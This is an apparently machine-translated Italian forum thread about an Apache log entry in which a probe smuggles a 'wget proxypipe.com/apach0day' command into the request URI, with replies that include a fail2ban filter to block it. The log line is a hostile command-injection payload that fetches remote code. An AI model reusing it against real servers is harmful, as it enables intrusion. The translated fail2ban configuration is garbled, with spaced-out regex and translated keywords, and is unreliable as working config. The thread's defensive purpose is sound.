oggi ho ricevuto questo
16X.XXX.XX.77 - - [28/Jul/2014:--:--:--] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 3596 "-" "chroot-apach0day"
quindi con
HTTP_USER_AGENT: chroot-apach0day
REQUEST_URI: x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day
viene visualizzato nel registro di accesso e sembra sospetto ... qualche idea al riguardo?
Proxypipe.com è ospitato da Voxility S.R.L (AS39743) (AS3223). La voxility è nota per essere una pessima società di hosting, consentendo l'hosting di malware, l'invio di spam, l'esecuzione di DDoS et cetera dai loro IP.
È meglio bloccare tutti i loro intervalli IP altrimenti potresti avere a che fare con attacchi DDoS. L'ho vissuto tutto il giorno molto prima.
Puoi trovare un elenco dei loro intervalli IP qui Voxility (AS39743) e Voxility (AS3223)
Anch'io ho avuto sonde simili. Tuttavia, ho ottenuto tre sonde diverse, tutte con carichi utili diversi. L'esecuzione di ls -a mostrava una nuova directory chiamata .ssh nella mia root dei documenti, con un file chiamato notshell.php
Ho eliminato immediatamente la directory e distrutto l'istanza DigitalOcean
La mia ipotesi è che qualcuno stia tentando di creare una sorta di attacco ai server
Ecco una soluzione rapida e sporca per bloccare l'utilizzo di fail2ban. (Se al momento non utilizzi fail2ban, google per il tuo sistema operativo.)
Se hai installato fail2ban, vedi sotto. Le posizioni delle note dei file fail2ban potrebbero essere diverse, a seconda del sistema operativo. L'esempio sotto è da un server Debian. Questo esempio non copre i tempi di divieto, ecc .--- solo come creare un filtro e aggiungerlo a jail.local. Ci sono molti esempi di configurazione fail2ban su google per più sistemi.
Quick-And-Dirty (Debian Linux):
1) Crea un nuovo file apache-0day.conf in /etc/fail2ban/filter.d che contiene:
# Fail2Ban file di configurazione
# Filtro limitato per bloccare gli attacchi apach0day
[Definizione]
Opzione: failregex
# Note: regex per abbinare questo tipo di richiesta:
# 162.253.66.77 - - [28 / Jul / 2014: 19: 02: 00 +0000] "GET /? x0a / x04 / x0a / x02 / x06 / x08 / x09 / cDDOSpart3dns; wget% 20proxypipe.com / apach0day; HTTP / 1.0 "200 359" - "" chroot-apach0day "
failregex = ^ -. "(GET | POST). \ ?. proxypipe | apach0day. $
Opzione: ignoreregex
Note: regex per ignorare. Se questa regex corrisponde, la linea viene ignorata.
Valori: TEXT
# ignoreregex =
2) Filtro di prova con comando: fail2ban-regex /var/log/apache2/access.log /etc/fail2ban/filter.d/apache-0day.conf
3) Modifica /etc/fail2banl/jail.local, per aggiungere questo jail:
[apache-0 giorni]
abilitato = true
port = http, https
filter = apache-0day
logpath = /var/log/apache*/*access.log
maxretry = 2
4) Test della nuova configurazione generale (attenzione per AVVISO e correzione, se necessario): fail2ban-client -d
5) Riavvia fail2ban: /etc/init.d/fail2ban restart
Leggi altre domande sui tag apache